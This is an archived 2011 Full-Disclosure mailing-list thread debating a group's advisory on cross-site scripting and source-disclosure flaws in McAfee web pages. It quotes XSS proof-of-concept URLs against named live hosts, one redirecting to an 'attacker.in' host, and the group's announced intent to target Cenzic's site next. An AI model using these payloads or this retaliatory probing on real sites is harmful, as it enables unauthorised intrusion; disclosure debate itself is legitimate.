From: "Thor (Hammer of God)" 
To: "Ryan Sears" , noloa...@gmail.com
Cc: "full-disclosure" 
Sent: Wednesday, March 30, 2011 2:12:37 PM GMT -05:00 US/Canada Eastern
Subject: RE: [Full-disclosure] Vulnerabilities in *McAfee.com

Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Thor (Hammer of God)]

Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it "to ensure that the vendors fix their problems" but it's not 
really any of their business to do so.

I think someone would be hard pressed to justify (defend) their actions when 
they basically "attack" a site that they don't own, without permission, with 
the express intent of finding a vulnerability.  That's the difference between a 
"test" and an "attack."   It doesn't matter how trivial their finds are, or 
what the outcome of the scan is, it is the fact that no one asked, nor wants 
them to do this.  

Technically, what they are doing is in fact illegal - in the US anyway.   So 
there is another aspect of this that deserves some discussion, I think.

t


>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
>boun...@lists.grok.org.uk] On Behalf Of Ryan Sears
>Sent: Wednesday, March 30, 2011 10:45 AM
>To: noloa...@gmail.com
>Cc: full-disclosure
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
>matter),
>if anyone should understand that a XSS should really only be construed a
>'criminal act' if it's indeed used to attack someone. If a group is taking the 
>time
>out of their day to find and disclose issues to Mcafee, they should probably be
>thankful. What about finding a vulnerability in Mcafee's virus scanner? Could
>that be construed as a 'criminal act' if they disclose it? Where do you draw 
>the
>line?
>
>Basically this sort of thing pushes the community into silence until something
>truly criminal happens. I'm not saying give anyone massive amounts of credit
>for publishing a few XSS bugs (because there's millions of them out there),
>but don't label them as a criminal for trying to help. That's just idiotic IMO.
>
>If you run an enterprise level solution for antivirus AND web vulnerability
>testing, the community understands that it's a process not unlike any other.
>There will be bugs, but it only demolishes the image of Mcafee to see them
>handle it like this in particular. If they would have been appreciative about 
>it,
>and promptly fixed their website (or at the very least maintained friendly
>contact) this incident would have pretty much gone un-noticed.
>
>Look at LastPass as an example.
>
>http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html
>
>They had someone poking at their site, who managed to find a XSS bug using
>CRLF injections. They were appreciative of the find, 2.5 hrs later the issue 
>was
>fixed, and there was that blog post about exactly what they were going to do
>about it. They took full responsibility for the fact that THEIR coding was to
>blame, and basically said 'This is what happened, and this is why it will
>probably never happen again'. This spoke hugely to me (as I'm sure it did the
>rest of the community) because it shows a company that's willing to admit it
>made a mistake, as opposed to sitting on their haunches and blaming people
>for looking for these sorts of bugs. Oh and not every customer of their service
>has to pay massive licensing fees, as there's a free version as well. In my 
>mind
>at least this equates to a company that cares more about their customers that
>don't pay a single dime, then a company who forces people to pay massive
>amounts of coin for shaky automated scanning and services. That's just the
>way I see it though.
>
>
>Someone's gotta tell the emperor he has no clothes on.
>
>Ryan
>
>- Original Message -
>From: "Jeffrey Walton" 
>To: "YGN Ethical Hacker Group" 
>Cc: "full-disclosure" 
>Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group 
>wrote:
>> According to xssed.com,  there are two remaining XSS issues:
>>
>> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>>
>>
>> You guys know our disclosed issues are very simple and can easily be
>> found through viewing HTML/JS source codes and simple Google Hacking
>>
>(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adown

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Ryan Sears]

Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
matter), if anyone should understand that a XSS should really only be construed 
a 'criminal act' if it's indeed used to attack someone. If a group is taking 
the time out of their day to find and disclose issues to Mcafee, they should 
probably be thankful. What about finding a vulnerability in Mcafee's virus 
scanner? Could that be construed as a 'criminal act' if they disclose it? Where 
do you draw the line?

Basically this sort of thing pushes the community into silence until something 
truly criminal happens. I'm not saying give anyone massive amounts of credit 
for publishing a few XSS bugs (because there's millions of them out there), but 
don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability 
testing, the community understands that it's a process not unlike any other. 
There will be bugs, but it only demolishes the image of Mcafee to see them 
handle it like this in particular. If they would have been appreciative about 
it, and promptly fixed their website (or at the very least maintained friendly 
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example. 

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find a XSS bug using CRLF 
injections. They were appreciative of the find, 2.5 hrs later the issue was 
fixed, and there was that blog post about exactly what they were going to do 
about it. They took full responsibility for the fact that THEIR coding was to 
blame, and basically said 'This is what happened, and this is why it will 
probably never happen again'. This spoke hugely to me (as I'm sure it did the 
rest of the community) because it shows a company that's willing to admit it 
made a mistake, as opposed to sitting on their haunches and blaming people for 
looking for these sorts of bugs. Oh and not every customer of their service has 
to pay massive licensing fees, as there's a free version as well. In my mind at 
least this equates to a company that cares more about their customers that 
don't pay a single dime, then a company who forces people to pay massive 
amounts of coin for shaky automated scanning and services. That's just the way 
I see it though. 

Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: "Jeffrey Walton" 
To: "YGN Ethical Hacker Group" 
Cc: "full-disclosure" 
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
 wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
Too funny I wonder is Aaron Barr is consulting for Cenzic.

Jeff

>> [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Jeffrey Walton]

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
 wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
Too funny I wonder is Aaron Barr is consulting for Cenzic.

Jeff

>> [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Christian Sciberras]

Thor, that's just a marketing adjective.

Just like when you're asked to buy authentic replica r0lex watches.

Cheers,
Chris.




On Wed, Mar 30, 2011 at 5:22 PM, Thor (Hammer of God)
 wrote:
> Let's see here... As an "ethical hacker group," you don't like being 
> criticized by someone as engaging in illegal activities, so you announce on a 
> public site that you are going to attack the company?   Brilliant.
> t
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
> Hacker Group
> Sent: Wednesday, March 30, 2011 5:44 AM
> To: Pablo Ximenes
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); // 
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be found 
> through viewing HTML/JS source codes and simple Google Hacking 
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
> http://www.cenzic.com/company/management/khera/,  according to Network World 
> News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
> see how strong the Kung-Fu of Cenzic HailStorm scanner is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> FIY
>>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
>> ecurity-Holes
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>>
>> 2011/3/28 Pablo Ximenes :
>>> blog post about this: http://ximen.es/?p=469
>>>
>>> Please, don't throw stones at me.
>>>
>>> []'s
>>>
>>>
>>> Pablo Ximenes
>>> http://ximen.es/
>>> http://twitter.com/pabloximenes
>>>
>>>
>>>
>>> 2011/3/27 YGN Ethical Hacker Group 
>>>>
>>>> Vulnerabilities in *McAfee.com
>>>>
>>>>
>>>> 1. VULNERABILITY DESCRIPTION
>>>>
>>>> -> Cross Site Scripting
>>>>
>>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
>>>> ocation.replace('attacker.in')
>>>>
>>>> -> Information Disclosure > Internal Hostname:
>>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>>
>>>>    ($ ruby host-extract.rb -a
>>>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>>
>>>> -> Information Disclosure > Source Code Disclosure:
>>>>
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
>>>> kiecommon.asp
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/app
>>>> common.asp
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/par
>>>> tnerCodesLibrary.asp
>>>>
>>>> view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>>
>>>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>>        view-source:http://download.mcafee.com/updates/updates.asp
>>>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>>
>>>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
>>>> p
>>>>
>>>> view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>>
>>>>
>>>> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
>>>> ontrols.asp
>>>>
>>>> view-source:http://download.mcafee.com/common/ssi/errHandle

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Thor (Hammer of God)]

Let's see here... As an "ethical hacker group," you don't like being criticized 
by someone as engaging in illegal activities, so you announce on a public site 
that you are going to attack the company?   Brilliant. 
t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); // 
https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //


You guys know our disclosed issues are very simple and can easily be found 
through viewing HTML/JS source codes and simple Google Hacking 
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
http://www.cenzic.com/company/management/khera/,  according to Network World 
News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
see how strong the Kung-Fu of Cenzic HailStorm scanner is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> FIY
>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
> ecurity-Holes
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
>
> 2011/3/28 Pablo Ximenes :
>> blog post about this: http://ximen.es/?p=469
>>
>> Please, don't throw stones at me.
>>
>> []'s
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>> 2011/3/27 YGN Ethical Hacker Group 
>>>
>>> Vulnerabilities in *McAfee.com
>>>
>>>
>>> 1. VULNERABILITY DESCRIPTION
>>>
>>> -> Cross Site Scripting
>>>
>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
>>> ocation.replace('attacker.in')
>>>
>>> -> Information Disclosure > Internal Hostname:
>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>
>>>    ($ ruby host-extract.rb -a
>>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>
>>> -> Information Disclosure > Source Code Disclosure:
>>>
>>>
>>>  
>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
>>> kiecommon.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/app
>>> common.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/par
>>> tnerCodesLibrary.asp
>>>        
>>> view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>        
>>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>        view-source:http://download.mcafee.com/updates/updates.asp
>>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>        
>>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
>>> p
>>>        
>>> view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
>>> ontrols.asp
>>>        
>>> view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>>        
>>> view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/us/upgradeCenter/productCompa
>>> rison_top.asp
>>>        view-source:http://download.mcafee.com/us/bannerAd.asp
>>>
>>>  
>>> view-source:http://download.mcafee.com/common/ssi/standard/global_fo
>>> ot_us.asp
>>>
>>>
>>> 2. RECOMMENDATION
>>>
>>> - Fully utilize Mcafee FoundStone Experts
>>> - Use outbound monitoring of traffic to detect potential information 
>>> leakag

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

?

On Wed, Mar 30, 2011 at 1:49 PM, Benji  wrote:

> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
> ethical hacking group YGN!!!111
>
>
> (Plzdontxssme)
>
> On 3/30/11, YGN Ethical Hacker Group  wrote:
> > According to xssed.com,  there are two remaining XSS issues:
> >
> > https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> > https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> >
> >
> > You guys know our disclosed issues are very simple and can easily be
> > found through viewing HTML/JS source codes and simple Google Hacking
> > (
> http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
> >
> > However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> > http://www.cenzic.com/company/management/khera/,  according to Network
> > World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> > is.
> >
> >
> > -
> > Best regards,
> > YGN Ethical Hacker Group
> > Yangon, Myanmar (Burma)
> > http://yehg.net
> > Our Lab | http://yehg.net/lab
> > Our Directory | http://yehg.net/hwd
> >
> >
> >
> >
> > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> >> FIY
> >>
> >>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
> >>
> >>
> >> Pablo Ximenes
> >> http://ximen.es/
> >> http://twitter.com/pabloximenes
> >>
> >>
> >>
> >>
> >> 2011/3/28 Pablo Ximenes :
> >>> blog post about this: http://ximen.es/?p=469
> >>>
> >>> Please, don't throw stones at me.
> >>>
> >>> []'s
> >>>
> >>>
> >>> Pablo Ximenes
> >>> http://ximen.es/
> >>> http://twitter.com/pabloximenes
> >>>
> >>>
> >>>
> >>> 2011/3/27 YGN Ethical Hacker Group 
> 
>  Vulnerabilities in *McAfee.com
> 
> 
>  1. VULNERABILITY DESCRIPTION
> 
>  -> Cross Site Scripting
> 
> 
> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
> ')
> 
>  -> Information Disclosure > Internal Hostname:
> http://www.mcafee.com/js/omniture/omniture_profile.js
> 
> ($ ruby host-extract.rb -a
>  http://www.mcafee.com/js/omniture/omniture_profile.js)
> 
>  -> Information Disclosure > Source Code Disclosure:
> 
> 
>   view-source:
> http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
> 
>   view-source:
> http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
> 
>   view-source:
> http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
> view-source:
> http://download.mcafee.com/clinic/Includes/common.asp
> 
>   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
> 
>   view-source:http://download.mcafee.com/updates/common/dat_common.asp
> view-source:http://download.mcafee.com/updates/updates.asp
> view-source:http://download.mcafee.com/updates/superDat.asp
> view-source:http://download.mcafee.com/eval/evaluate2.asp
> 
>   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
> 
>   view-source:
> http://download.mcafee.com/common/ssi/errHandler_soft.asp
> view-source:
> http://download.mcafee.com/common/ssi/variables.asp
> 
>   view-source:
> http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
> view-source:
> http://download.mcafee.com/common/ssi/errHandler.asp
> view-source:
> http://download.mcafee.com/common/ssi/common_subs.asp
> 
>   view-source:
> http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
> view-source:http://download.mcafee.com/us/bannerAd.asp
> 
>   view-source:
> http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
> 
> 
>  2. RECOMMENDATION
> 
>  - Fully utilize Mcafee FoundStone Experts
>  - Use outbound monitoring of traffic to detect potential information
>  leakage
> 
> 
>  3. VENDOR
> 
>  McAfee Inc
>  http://www.mcafee.com
> 
> 
>  4. DISCLOSURE TIME-LINE
> 
>  2011-02-10: reported vendor
>  2011-02-12: vendor replied "we are working to resolve the issue as
>  quickly as possible"
>  2011-03-27: vulnerability found to be unfixed completely
>  2011-03-27: vulnerability disclosed
> 
> 
>  5. REFERENCES
> 
>  Original Advisory URL:
> 
> 
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>  Former Disclosure, 2008:
>  http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>  Former Disclosure, 2009:
> 
> 
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>  Former Disclosure, 2010:
> 
> 
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>  host

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Benji]

"However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is."

On Wed, Mar 30, 2011 at 2:57 PM, Cal Leeming  wrote:

> ?
>
>
> On Wed, Mar 30, 2011 at 1:49 PM, Benji  wrote:
>
>> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
>> ethical hacking group YGN!!!111
>>
>>
>> (Plzdontxssme)
>>
>> On 3/30/11, YGN Ethical Hacker Group  wrote:
>> > According to xssed.com,  there are two remaining XSS issues:
>> >
>> > https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> > https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> >
>> >
>> > You guys know our disclosed issues are very simple and can easily be
>> > found through viewing HTML/JS source codes and simple Google Hacking
>> > (
>> http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com
>> ).
>> >
>> > However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
>> > http://www.cenzic.com/company/management/khera/,  according to Network
>> > World News editor - Ellen Messmer.  Thus, the next target is Cenzic
>> > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
>> > is.
>> >
>> >
>> > -
>> > Best regards,
>> > YGN Ethical Hacker Group
>> > Yangon, Myanmar (Burma)
>> > http://yehg.net
>> > Our Lab | http://yehg.net/lab
>> > Our Directory | http://yehg.net/hwd
>> >
>> >
>> >
>> >
>> > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> >> FIY
>> >>
>> >>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>> >>
>> >>
>> >> Pablo Ximenes
>> >> http://ximen.es/
>> >> http://twitter.com/pabloximenes
>> >>
>> >>
>> >>
>> >>
>> >> 2011/3/28 Pablo Ximenes :
>> >>> blog post about this: http://ximen.es/?p=469
>> >>>
>> >>> Please, don't throw stones at me.
>> >>>
>> >>> []'s
>> >>>
>> >>>
>> >>> Pablo Ximenes
>> >>> http://ximen.es/
>> >>> http://twitter.com/pabloximenes
>> >>>
>> >>>
>> >>>
>> >>> 2011/3/27 YGN Ethical Hacker Group 
>> 
>>  Vulnerabilities in *McAfee.com
>> 
>> 
>>  1. VULNERABILITY DESCRIPTION
>> 
>>  -> Cross Site Scripting
>> 
>> 
>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
>> ')
>> 
>>  -> Information Disclosure > Internal Hostname:
>> http://www.mcafee.com/js/omniture/omniture_profile.js
>> 
>> ($ ruby host-extract.rb -a
>>  http://www.mcafee.com/js/omniture/omniture_profile.js)
>> 
>>  -> Information Disclosure > Source Code Disclosure:
>> 
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>> 
>>   view-source:
>> http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>> view-source:
>> http://download.mcafee.com/clinic/Includes/common.asp
>> 
>>   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>> 
>>   view-source:
>> http://download.mcafee.com/updates/common/dat_common.asp
>> view-source:http://download.mcafee.com/updates/updates.asp
>> view-source:http://download.mcafee.com/updates/superDat.asp
>> view-source:http://download.mcafee.com/eval/evaluate2.asp
>> 
>>   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/errHandler_soft.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/variables.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/errHandler.asp
>> view-source:
>> http://download.mcafee.com/common/ssi/common_subs.asp
>> 
>>   view-source:
>> http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>> view-source:http://download.mcafee.com/us/bannerAd.asp
>> 
>>   view-source:
>> http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>> 
>> 
>>  2. RECOMMENDATION
>> 
>>  - Fully utilize Mcafee FoundStone Experts
>>  - Use outbound monitoring of traffic to detect potential information
>>  leakage
>> 
>> 
>>  3. VENDOR
>> 
>>  McAfee Inc
>>  http://www.mcafee.com
>> 
>> 
>>  4. DISCLOSURE TIME-LINE
>> 
>>  2011-02-10: reported vendor
>>  2011-02-12: vendor replied "we are working to resolve the issue as
>>  quickly as possible"
>>  2011-03-27: vulnerability found to be unfixed completely
>>  2011-03-27: vulnerability disclosed
>> 
>> 
>>  5. REFERENCES

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Benji]

I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111


(Plzdontxssme)

On 3/30/11, YGN Ethical Hacker Group  wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> FIY
>>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>>
>> 2011/3/28 Pablo Ximenes :
>>> blog post about this: http://ximen.es/?p=469
>>>
>>> Please, don't throw stones at me.
>>>
>>> []'s
>>>
>>>
>>> Pablo Ximenes
>>> http://ximen.es/
>>> http://twitter.com/pabloximenes
>>>
>>>
>>>
>>> 2011/3/27 YGN Ethical Hacker Group 

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 -> Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 -> Information Disclosure > Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 -> Information Disclosure > Source Code Disclosure:


  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
        view-source:http://download.mcafee.com/clinic/Includes/common.asp

  view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp

  view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
        view-source:http://download.mcafee.com/common/ssi/variables.asp

  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied "we are working to resolve the issue as
 quickly as possible"
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo:
 http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
